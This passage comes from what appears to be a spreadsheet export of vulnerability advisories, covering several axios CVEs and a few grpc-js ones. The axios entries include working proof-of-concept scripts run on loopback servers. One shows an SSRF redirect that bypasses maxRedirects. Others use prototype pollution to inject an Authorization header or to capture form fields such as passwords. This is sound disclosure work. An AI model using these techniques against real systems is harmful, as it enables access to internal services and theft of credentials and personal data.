  headers, withCredentials, fetchOptions,
  maxContentLength, maxBodyLength,
} = resolveConfig(config);
// maxRedirects is not extracted
```
The options object passed to `fetch()` has no `redirect` key:
```js
const resolvedOptions = {
  ...fetchOptions,       // redirect only set here if caller explicitly passes fetchOptions.redirect
  signal: composedSignal,
  method: method.toUpperCase(),
  headers: toByteStringHeaderObject(headers.normalize()),
  body: data,
  duplex: 'half',
  credentials: isCredentialsSupported ? withCredentials : undefined,
};
```
Because no `redirect` key is present, the Fetch API default of `redirect: 'follow'` applies, so redirects are handled by the runtime rather than constrained by axios `maxRedirects`. The HTTP adapter, by contrast, delegates to `follow-redirects`, which reads `maxRedirects`, enforces the cap, and strips `Authorization`, `Cookie`, and `Proxy-Authorization` on cross-origin redirects.
The discrepancy between adapters is not documented. The threat model covers credential stripping on redirects (T-R2) and cites `follow-redirects` as the mitigation, but makes no mention that the fetch adapter does not participate in this mitigation. See: https://github.com/axios/axios/blob/master/THREATMODEL.md#t-r2-credential-leakage-on-cross-origin-redirect
The behaviour difference between adapters is summarised below:
| Behaviour                              | HTTP adapter                    | Fetch adapter            |
|----------------------------------------|---------------------------------|--------------------------|
| Reads `config.maxRedirects`            | Yes                             | **No**                   |
| Enforces `maxRedirects: 0`             | Yes -- throws on any redirect   | **No -- follows silently**|
| Strips `Authorization` cross-origin    | Yes (`follow-redirects` &gt;=1.15.8)| Runtime-dependent       |
| Strips `Cookie` cross-origin           | Yes                             | Runtime-dependent        |
### When is the fetch adapter selected?
- **Deno, Bun, Cloudflare Workers:** no Node.js `http` module available; the adapter list falls through to `'fetch'`
- **Explicit config:** `axios.get(url, { adapter: 'fetch' })`
- **Custom adapter list:** `axios.create({ adapter: ['fetch'] })`
## PoC
```js
import http from 'http';
import axios from './index.js';
// Server A: the "trusted" external target, issues open redirects to Server B
const serverA = http.createServer((req, res) =&gt; {
  if (req.url === '/api/data') {
    res.writeHead(302, { Location: 'http://127.0.0.1:13802/internal/secrets' });
    return res.end();
  }
  if (req.url === '/api/change-config') {
    res.writeHead(302, { Location: 'http://127.0.0.1:13802/internal/admin/config' });
    return res.end();
  }
  res.writeHead(200, { 'Content-Type': 'application/json' });
  res.end(JSON.stringify({ ok: true }));
});
let internalHits = 0;
let internalConfig = {};
// Server B: the "internal" service, should be unreachable from the application
const serverB = http.createServer(async (req, res) =&gt; {
  internalHits++;
  if (req.url === '/internal/secrets') {
    res.writeHead(200, { 'Content-Type': 'application/json' });
    return res.end(JSON.stringify({
      secret: 'FAKE_AWS_SECRET_ACCESS_KEY_FOR_POC_ONLY',
      role:   'arn:aws:iam::000000000000:role/FakeProductionRole',
    }));
  }
  if (req.url === '/internal/admin/config') {
    internalConfig = { compromised: true, source: 'redirect-followed-by-fetch-adapter' };
    res.writeHead(200, { 'Content-Type': 'application/json' });
    return res.end(JSON.stringify({
      reached: 'state-changing internal admin endpoint',
      changed: true,
      internalConfig,
    }));
  }
  res.writeHead(404);
  res.end();
});
await Promise.all([
  new Promise((resolve, reject) =&gt; { serverA.listen(13801, '127.0.0.1', resolve); serverA.on('error', reject); }),
  new Promise((resolve, reject) =&gt; { serverB.listen(13802, '127.0.0.1', resolve); serverB.on('error', reject); }),
]);
const targetUrl    = 'http://127.0.0.1:13801/api/data';
const changeUrl    = 'http://127.0.0.1:13801/api/change-config';
const internalUrl  = 'http://127.0.0.1:13802/internal/secrets';
const internalCfg  = 'http://127.0.0.1:13802/internal/admin/config';
console.log('Axios maxRedirects bypass via fetch adapter PoC');
console.log(`axios VERSION=${axios.VERSION}`);
console.log(`maxRedirects=0`);
console.log(`Target URL=${targetUrl}`);
console.log(`  redirects to ${internalUrl}`);
console.log(`Change URL=${changeUrl}`);
console.log(`  redirects to ${internalCfg}`);
console.log('');
// CONTROL: HTTP adapter correctly enforces maxRedirects: 0
let httpBlocked = false;
try {
  await axios.get(targetUrl, { maxRedirects: 0, adapter: 'http' });
  console.log('[CONTROL]  HTTP adapter + maxRedirects:0  BUG: should have thrown');
} catch (err) {
  httpBlocked = true;
  console.log(`[CONTROL]  HTTP adapter + maxRedirects:0  correctly blocked redirect ✓ (${err.code ?? err.message})`);
}
console.log(`[CONTROL]  Internal hits after HTTP adapter: ${internalHits}`);
// BYPASS: Fetch adapter silently ignores maxRedirects: 0
let fetchResponse = null;
try {
  fetchResponse = await axios.get(targetUrl, { maxRedirects: 0, adapter: 'fetch' });
  console.log('[BYPASS]   Fetch adapter + maxRedirects:0  SSRF succeeded ✗');
  console.log('           Response:', JSON.stringify(fetchResponse.data));
} catch (err) {
  console.log('[BYPASS]   Fetch adapter + maxRedirects:0  redirect blocked (unexpected):', err.message);
}
console.log(`[BYPASS]   Internal hits after fetch adapter: ${internalHits}`);
// BYPASS: Fetch adapter follows redirect to state-changing internal endpoint
let changedResponse = null;
try {
  changedResponse = await axios.get(changeUrl, { maxRedirects: 0, adapter: 'fetch' });
  console.log('[BYPASS]   Fetch adapter state change:', JSON.stringify(changedResponse.data));
  console.log(`[BYPASS]   Internal hits after state change: ${internalHits}`);
} catch (err) {
  console.log('[BYPASS]   State change request blocked (unexpected):', err.message);
}
console.log('');
if (httpBlocked &amp;&amp; fetchResponse &amp;&amp; changedResponse) {
  console.log('POC RESULT: fetch adapter followed redirects despite maxRedirects:0,');
  console.log('            reaching internal service and mutating internal state.');
} else if (httpBlocked &amp;&amp; fetchResponse) {
  console.log('POC RESULT: fetch adapter followed redirect despite maxRedirects:0,');
  console.log('            reaching internal service that should have been unreachable.');
} else if (!httpBlocked) {
  console.log('POC RESULT: HTTP adapter did not block redirect -- unexpected, check axios version.');
} else {
  console.log('POC RESULT: fetch adapter blocked redirect -- issue may be fixed.');
}
serverA.close();
serverB.close();
```
Run:
```bash
node poc-max-redirects.mjs
```
Observed:
```text
Axios maxRedirects bypass via fetch adapter PoC
axios VERSION=1.17.0
maxRedirects=0
Target URL=http://127.0.0.1:13801/api/data
  redirects to http://127.0.0.1:13802/internal/secrets
Change URL=http://127.0.0.1:13801/api/change-config
  redirects to http://127.0.0.1:13802/internal/admin/config
[CONTROL]  HTTP adapter + maxRedirects:0  correctly blocked redirect ✓ (ERR_BAD_RESPONSE)
[CONTROL]  Internal hits after HTTP adapter: 0
[BYPASS]   Fetch adapter + maxRedirects:0  SSRF succeeded ✗
           Response: {"secret":"FAKE_AWS_SECRET_ACCESS_KEY_FOR_POC_ONLY","role":"arn:aws:iam::000000000000:role/FakeProductionRole"}
[BYPASS]   Internal hits after fetch adapter: 1
[BYPASS]   Fetch adapter state change: {"reached":"state-changing internal admin endpoint","changed":true,"internalConfig":{"compromised":true,"source":"redirect-followed-by-fetch-adapter"}}
[BYPASS]   Internal hits after state change: 2
POC RESULT: fetch adapter followed redirects despite maxRedirects:0,
            reaching internal service and mutating internal state.
```
## Control
Axios does correctly enforce `maxRedirects: 0` in the HTTP adapter. The `[CONTROL]` case above confirms this: the same request with `adapter: 'http'` throws rather than following the redirect, and the internal hit counter stays at `0`:
```text
[CONTROL]  HTTP adapter + maxRedirects:0  correctly blocked redirect ✓ (ERR_BAD_RESPONSE)
[CONTROL]  Internal hits after HTTP adapter: 0
```
The issue is not that `maxRedirects` is broken globally. It is enforced correctly for the HTTP adapter. The bypass is specific to the fetch adapter, which never reads the option and passes no `redirect` constraint to the underlying `fetch()` call.
## Impact
This is a redirect enforcement bypass affecting axios applications running in environments where the fetch adapter is active.
The internal admin route in the PoC simulates an affected deployment where a redirected request can reach state-changing internal APIs. The vulnerability is that `maxRedirects: 0` is silently ignored by the fetch adapter; the exact impact depends on what redirect targets are reachable from the runtime.
The impact is environment- and configuration-dependent. It affects axios users who:
- Set `maxRedirects: 0` as a defense against redirect-based SSRF, and
- Run in an environment where the fetch adapter is selected, either by runtime (Deno, Bun, Cloudflare Workers) or by explicit configuration
In these cases, a `302` redirect from the initial target is followed silently by default, unless the caller separately sets `fetchOptions.redirect`. If the redirect target is an internal service, the application returns its response to the caller with no indication that a redirect occurred or that `maxRedirects` was not honoured. The failure is silent: no error is thrown, no warning is logged.
The bypass is not limited to read-only access. As demonstrated by the second bypass case, a redirect to a state-changing internal endpoint succeeds equally. An attacker who can influence the redirect destination, for example through an open redirect on the initial target or a server they control, can reach internal and trigger mutations that the application never intended to issue.
Potentially affected environments include:
- Deno and Bun applications using axios where the fetch adapter is the default.
- Cloudflare Workers using axios, which has no Node.js `http` module.
- Node.js applications that explicitly configure `adapter: 'fetch'` or a custom adapter list that resolves to fetch.
- Any application that conditionally sets `maxRedirects: 0` and runs across multiple environments with different adapter selection.
Internal services reachable via a redirect include cloud instance metadata endpoints (`169.254.169.254`), unauthenticated local services such as Redis or internal admin APIs, and other hosts accessible from the application's network that are not intended to be reachable by the caller. The hit counter in the PoC makes the access concrete: `0` after the HTTP control, `1` after the confidentiality bypass, `2` after the integrity bypass.
This should not be characterised as an unconditional SSRF. The bypass requires either an open redirect on the initial target, or a URL that is itself a redirect. The issue is that `maxRedirects: 0`, which is the intended mitigation for this class of attack, is silently non-functional in the fetch adapter, leaving applications with a false sense of protection.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101907</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101908</t>
        </is>
      </c>
      <c r="D17" s="5" t="inlineStr"/>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M17" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr"/>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios fetch adapter requests can be altered by inherited properties on `fetchOptions`. The adapter resolves method, headers, body, signal, and credentials into `resolvedOptions`, creates a `Request`, and then calls `fetch(request, fetchOptions)` instead of `fetch(request, resolvedOptions)`. In runtimes such as Node's undici-backed fetch, inherited `fetchOptions.headers` can override the headers already placed on the `Request`.
Axios does not create the prototype pollution source. This is a read-side gadget that becomes exploitable after same-process prototype pollution.
## Impact
An attacker with a prior prototype-pollution primitive can cause affected fetch-adapter requests to send attacker-controlled headers and drop caller-specified headers. This can affect authorization, cache behavior, metadata-service interactions, or application-specific header-based controls.
The issue is specific to fetch-adapter behavior and does not affect Node HTTP adapter requests.
## Affected Functionality
Affected:
- `adapter: 'fetch'`.
- Runtime environments where the fetch adapter is selected.
- Requests where `fetchOptions` is an object that does not have safe own values for sensitive fetch init fields.
Not affected:
- Node HTTP adapter.
- Requests that do not use the fetch adapter.
- Processes where `Object.prototype` is not polluted.
## Technical Details
`lib/adapters/fetch.js` builds:
```js
const resolvedOptions = {
  ...fetchOptions,
  signal: composedSignal,
  method: method.toUpperCase(),
  headers: toByteStringHeaderObject(headers.normalize()),
  body: data,
  duplex: 'half',
  credentials: isCredentialsSupported ? withCredentials : undefined,
};
request = isRequestSupported &amp;&amp; new Request(url, resolvedOptions);
let response = await (isRequestSupported
  ? _fetch(request, fetchOptions)
  : _fetch(url, resolvedOptions));
```
The fallback path without `Request` uses `resolvedOptions`, but the `Request` path passes the original `fetchOptions` as the second argument to `fetch()`. That second argument can contain inherited properties from `Object.prototype`.
Local verification on axios `1.18.1` set `Object.prototype.headers = { Authorization: 'Bearer POLLUTED' }` and called the fetch adapter with `headers: { 'X-Good': 'yes' }, fetchOptions: {}`. The loopback server received `Authorization: Bearer POLLUTED` and did not receive `X-Good`.
## Proof of Concept of Attack
Constrained local demonstration:
```js
Object.prototype.headers = { Authorization: 'Bearer POLLUTED' };
try {
  await axios.get(url, {
    adapter: 'fetch',
    headers: { 'X-Good': 'yes' },
    fetchOptions: {}
  });
} finally {
  delete Object.prototype.headers;
}
```
Expected safe behavior is that the sanitized axios headers remain in force. Current behavior can use the inherited fetch init headers instead.
## Workarounds
Use the Node HTTP adapter for security-sensitive server-side requests until fixed. If the fetch adapter must be used, avoid passing empty `fetchOptions` objects in processes where prototype pollution is possible, and set explicit safe own values for fetch init fields.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
Hello, I’m not completely sure if this is something you’d consider a security issue, since it depends on prototype pollution happening somewhere else first, but I wanted to report it just in case.
I was testing the fetch adapter with polluted prototype values and found that `Object.prototype.headers` can change the request axios sends.
The issue seems to be in `lib/adapters/fetch.js`. Axios creates a `Request` with the resolved headers/method/body, but then sends it with `fetch(request, fetchOptions)`. With undici, if `fetchOptions` doesn’t have its own headers, an inherited `Object.prototype.headers` value can be used during the final fetch call.
I tested it with this:
```js
import http from 'node:http';
import axios from 'axios';
const server = http.createServer((req, res) =&gt; {
  res.end(JSON.stringify({
    authorization: req.headers.authorization || null,
    xGood: req.headers['x-good'] || null
  }));
});
await new Promise(resolve =&gt; server.listen(0, '127.0.0.1', resolve));
const { port } = server.address();
Object.prototype.headers = {
  Authorization: 'Bearer POLLUTED'
};
try {
  const res = await axios.get(`http://127.0.0.1:${port}/`, {
    adapter: 'fetch',
    headers: { 'X-Good': 'yes' },
    fetchOptions: {}
  });
  console.log(res.data);
} finally {
  delete Object.prototype.headers;
  server.close();
}
```
The result I get is:
```json
{
  "authorization": "Bearer POLLUTED",
  "xGood": null
}
```
So the polluted Authorization header is sent, and the normal axios header is not.
Changing the fetch call to pass the already resolved options fixes it for me:
```diff
- _fetch(request, fetchOptions)
+ _fetch(request, resolvedOptions)
```
`resolvedOptions` already includes `...fetchOptions`, so custom fetch options should still work, while headers, method, body, and signal stay as clean own values.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101908</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101909</t>
        </is>
      </c>
      <c r="D18" s="5" t="inlineStr"/>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M18" s="5" t="inlineStr">
        <is>
          <t>0.34.0, 1.20.0</t>
        </is>
      </c>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr"/>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios form serialization reads `visitor`, `maxDepth`, `dots`, `indexes`, `metaTokens`, and `Blob` from an internal options object without own-property guards. When `Object.prototype` has been polluted elsewhere in the same process, those inherited values can change how axios serializes multipart and URL-encoded request bodies.
Axios does not create the prototype pollution source. This is a read-side gadget: axios turns an existing same-process pollution condition into altered request serialization or request failures.
## Impact
The impact depends on which property is polluted and which axios serialization path the application uses.
Polluted `dots`, `indexes`, or `metaTokens` can change field names and cause the receiving service to parse different data than the caller intended. Polluted `maxDepth` can cause nested form submissions to throw `ERR_FORM_DATA_DEPTH_EXCEEDED`, producing request-level or service-level denial of service for affected workflows. Polluted `visitor` can execute as the serializer visitor if an attacker can place a function on `Object.prototype`, but that condition generally implies a stronger same-process code-execution or malicious-dependency primitive and should be described carefully.
## Affected Functionality
Affected:
- `axios.toFormData()`.
- `transformRequest` paths that serialize plain objects to `multipart/form-data`.
- URL-encoded form serialization paths that rely on the same helper.
- `formSerializer` option defaults when the relevant properties are absent as own properties.
Not affected:
- JSON request bodies.
- Requests that do not invoke `toFormData()`.
- Processes where `Object.prototype` is not polluted.
## Technical Details
`lib/helpers/toFormData.js` merges caller options with defaults using `utils.toFlatObject()`. When `options` is `undefined`, `toFlatObject()` returns the default object unchanged:
```js
{
  metaTokens: true,
  dots: false,
  indexes: false
}
```
That default object has `Object.prototype` in its prototype chain. `toFormData()` then reads behavior-affecting values directly:
```js
const metaTokens = options.metaTokens;
const visitor = options.visitor || defaultVisitor;
const dots = options.dots;
const indexes = options.indexes;
const _Blob = options.Blob || (typeof Blob !== 'undefined' &amp;&amp; Blob);
const maxDepth = options.maxDepth === undefined ? DEFAULT_FORM_DATA_MAX_DEPTH : options.maxDepth;
```
These reads can resolve inherited polluted properties.
Local code review confirmed the direct reads in `v1.18.1`. Tag checks show the option-based form serializer exists in `v0.28.0` and later; `maxDepth` appears in the `1.x` line from the form recursion fix.
## Proof of Concept of Attack
Constrained local demonstration:
```js
Object.prototype.maxDepth = 1;
await axios.post(url, { a: { b: { c: 'value' } } }, {
  headers: { 'Content-Type': 'multipart/form-data' }
});
```
Expected safe behavior is that the default max depth is used unless the caller sets an own `formSerializer.maxDepth`. Current behavior reads the inherited value and can throw `ERR_FORM_DATA_DEPTH_EXCEEDED`.
For serializer alteration, polluting `Object.prototype.dots = true` changes nested field naming from bracket notation to dot notation when the caller did not opt into that behavior.
## Workarounds
Avoid serializing attacker-controlled objects as form data in a process with known prototype pollution. As a partial mitigation, callers can pass an own `formSerializer` object that sets explicit safe values for all relevant keys, including `visitor`, `maxDepth`, `dots`, `indexes`, `metaTokens`, and `Blob`.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
### Summary
_axios v1.18.1 contains a read-side prototype pollution gadget in its form data serialization logic. Six option properties (`visitor`, `maxDepth`, `dots`, `indexes`, `metaTokens`, `Blob`) are read from a plain JavaScript object that inherits from `Object.prototype` without `hasOwnProperty` guards. When `Object.prototype` has been polluted elsewhere in the process a common consequence of compromised transitive npm dependencies, these polluted values silently control axios' form serialization behavior._
_The highest-impact gadget is `visitor`: a polluted function on `Object.prototype.visitor` is invoked for every key-value pair during multipart and URL-encoded form serialization, receiving the value, key, path, and internal helper functions as arguments._
### Details
#### Root Cause
_The attack chain has three steps:_
_**Step 1:  `formSerializer` is read safely, but `undefined` flows through**_
_In `lib/defaults/index.js`, the default `transformRequest` function reads `formSerializer` from config using the `own()` helper, which enforces `hasOwnProp`:_
```js
const formSerializer = own(this, 'formSerializer');
```
_When the user does not explicitly configure `formSerializer`, this correctly returns `undefined`. That `undefined` is then passed as the `options` parameter to `toFormData()`:_
```js
return toFormData(data, _FormData &amp;&amp; new _FormData(), formSerializer);
//                                                     ^^^^^^^^^^^^ undefined
```
_**Step 2: `toFlatObject` returns a plain-object default**_
_Inside `lib/helpers/toFormData.js`, `options` (which is `undefined`) is merged with defaults via `utils.toFlatObject()`:_
```js
options = utils.toFlatObject(
    options,                                    // undefined
    { metaTokens: true, dots: false, indexes: false },  // plain object literal
    false,
    function defined(option, source) {
        return !utils.isUndefined(source[option]);
    }
);
```
_`toFlatObject` has an early-return for null/undefined sources:_
```js
// lib/utils.js:607
if (sourceObj == null) return destObj;
```
_Since `options` is `undefined`, the function returns `destObj` unchanged — the plain object `{ metaTokens: true, dots: false, indexes: false }`. This object's prototype is `Object.prototype`._
_**Step 3: Options are read without `hasOwnProp` guards**_
_The six option properties are read directly from the plain object:_
```js
const metaTokens = options.metaTokens;                                          // line 117
const visitor    = options.visitor || defaultVisitor;                            // line 119
const dots       = options.dots;                                                // line 120
const indexes    = options.indexes;                                             // line 121
const _Blob      = options.Blob || (typeof Blob !== 'undefined' &amp;&amp; Blob);       // line 122
const maxDepth   = options.maxDepth === undefined                                // line 123
                     ? DEFAULT_FORM_DATA_MAX_DEPTH
                     : options.maxDepth;
```
_None of these reads use `utils.hasOwnProp()`. Since the `options` object inherits from `Object.prototype`, any property set on `Object.prototype` by a compromised dependency is resolved through the prototype chain._
#### Why the Existing Defenses Didn't Catch This
_axios has extensive prototype pollution defenses. However, those defenses are all focused on the **config** object (created by `mergeConfig`, which returns `Object.create(null)`). The `toFormData` function creates its own internal options object that sits outside that boundary, and the 6 reads on that internal object were never audited._
### PoC
#### Reproduction Steps
#### Environment
_Any environment with Node.js and npm. Tested on:_
_- Node.js v24.15.0, npm 11.13.0_
_- axios v1.18.1 (latest release at time of writing)_
##### Step 1: Create a fresh project
```bash
mkdir axios-pp-poc
cd axios-pp-poc
npm init -y
npm install axios@1.18.1
```
##### Step 2: Create the PoC file
_Create `poc.mjs` with the following content:_
```js
import axios from 'axios';
import http from 'http';
// Simulate pollution from a compromised transitive dependency
let stolen = [];
Object.prototype.visitor = function(value, key, path, helpers) {
    stolen.push({ key, value });
    return helpers.defaultVisitor.call(this, value, key, path);
};
Object.prototype.maxDepth = 2;
const server = http.createServer((req, res) =&gt; {
    res.writeHead(200);
    res.end('{}');
});
server.listen(0, '127.0.0.1', async () =&gt; {
    const { port } = server.address();
    try {
        // Exfiltration: visitor intercepts all form fields
        await axios.post(`http://127.0.0.1:${port}/`, {
            username: 'john',
            password: 'SuperSecret123!',
            profile: { ssn: '123-45-6789' }
        }, { headers: { 'Content-Type': 'multipart/form-data' } });
        console.log('Stolen:', stolen);
        // Stolen: [
        //   { key: 'username', value: 'john' },
        //   { key: 'password', value: 'SuperSecret123!' },
        //   { key: 'profile',  value: { ssn: '123-45-6789' } },
        //   { key: 'ssn',      value: '123-45-6789' }
        // ]
        // DoS: nested object rejected by polluted maxDepth
        await axios.post(`http://127.0.0.1:${port}/`,
            { a: { b: { c: { d: 'value' } } } },
            { headers: { 'Content-Type': 'multipart/form-data' } }
        );
        // Throws: ERR_FORM_DATA_DEPTH_EXCEEDED
        //   "Object is too deeply nested (3 levels). Max depth: 2"
    } finally {
        delete Object.prototype.visitor;
        delete Object.prototype.maxDepth;
        server.close();
    }
});
```
##### Step 3: Run the PoC
```bash
node poc.mjs
```
### Impact
#### 1. Data Exfiltration via `visitor` (Confidentiality: High)
_A polluted `Object.prototype.visitor` function is called as the form data visitor:_
```js
visitor.call(formData, el, key, path, exposedHelpers)
```
_The attacker receives:_
_- **`value`** — the raw value being serialized (passwords, tokens, PII, API keys)_
_- **`key`** — the field name_
_- **`path`** — the full path array (e.g., `['profile', 'address', 'street']`)_
_- **`exposedHelpers`** — internal helpers including `defaultVisitor`, `convertValue`, `isVisitable`_
_By delegating to `helpers.defaultVisitor`, the attack is completely transparent, the request succeeds normally and the server receives intact data. The exfiltration is invisible to both the caller and the server._
#### 2. Denial of Service via `maxDepth` (Availability: Low)
_A polluted `Object.prototype.maxDepth` of `1` or `2` causes any moderately nested form data request to throw `ERR_FORM_DATA_DEPTH_EXCEEDED`. Applications that send nested objects as form data (common with APIs that accept `profile[name]`, `address[city]`, etc.) will experience mysterious failures._
#### 3. Data Corruption via `dots`, `indexes`, `metaTokens` (Integrity: Low)
_Polluting these options changes the serialization format of form field names:_
_- **`dots: true`** — changes bracket notation (`user[name]`) to dot notation (`user.name`)_
_- **`indexes: true`** — changes array serialization (`items[]`) to indexed (`items[0]`, `items[1]`)_
_- **`metaTokens: false`** — changes `obj{}` keys to raw json strings_
_The server may misinterpret the submitted form data, leading to silent data corruption._
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101909</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101915</t>
        </is>
      </c>
      <c r="D19" s="5" t="inlineStr"/>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr">
        <is>
          <t>npm, grpc</t>
        </is>
      </c>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr">
        <is>
          <t>npm:@grpc/grpc-js</t>
        </is>
      </c>
      <c r="M19" s="5" t="inlineStr">
        <is>
          <t>1.13.6, 1.14.5</t>
        </is>
      </c>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr"/>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t>### Impact
If an application method handler crashes, the error message is included in the status message sent to the client. This can leak to the client any sensitive data that may be included in the error message. This impacts anyone using `@grpc/grpc-js` to run servers.
### Patches
This vulnerability is fixed in 1.13.6 and 1.14.5.
### Workarounds
This can be avoided by using a top-level error handler in method handlers to strip out sensitive error information.</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101915</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101916</t>
        </is>
      </c>
      <c r="D20" s="5" t="inlineStr"/>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr">
        <is>
          <t>npm, grpc</t>
        </is>
      </c>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr">
        <is>
          <t>npm:@grpc/grpc-js</t>
        </is>
      </c>
      <c r="M20" s="5" t="inlineStr">
        <is>
          <t>1.13.6, 1.14.5</t>
        </is>
      </c>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr"/>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>### Impact
When server credentials are created with the `requireClientCertificate` option set to `false`, `getAuthContext` does not distinguish between authorized and unauthorized certificates in its return value. This can create improper authentication vulnerabilities for `@grpc/grpc-js` users who use the result of `getAuthContext` for authentication.
In particular, `@grpc/grpc-js-xds` can both set the `requireClientCertificate` option to `false` and use the return value of `getAuthContext` for RBAC authentication in some configurations.
### Patches
This vulenrability is fixed in 1.13.6 and 1.14.5.
### Workarounds
`@grpc/grpc-js` users using `getAuthContext` this way can avoid this problem by setting `requireClientCertificate` to `true`. `@grpc/grpc-js-xds` users using RBAC can avoid this by setting the `require_client_certificate` field to `true` in the DownstreamTlsContext in the xDS configuration.</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101916</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101918</t>
        </is>
      </c>
      <c r="D21" s="5" t="inlineStr"/>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
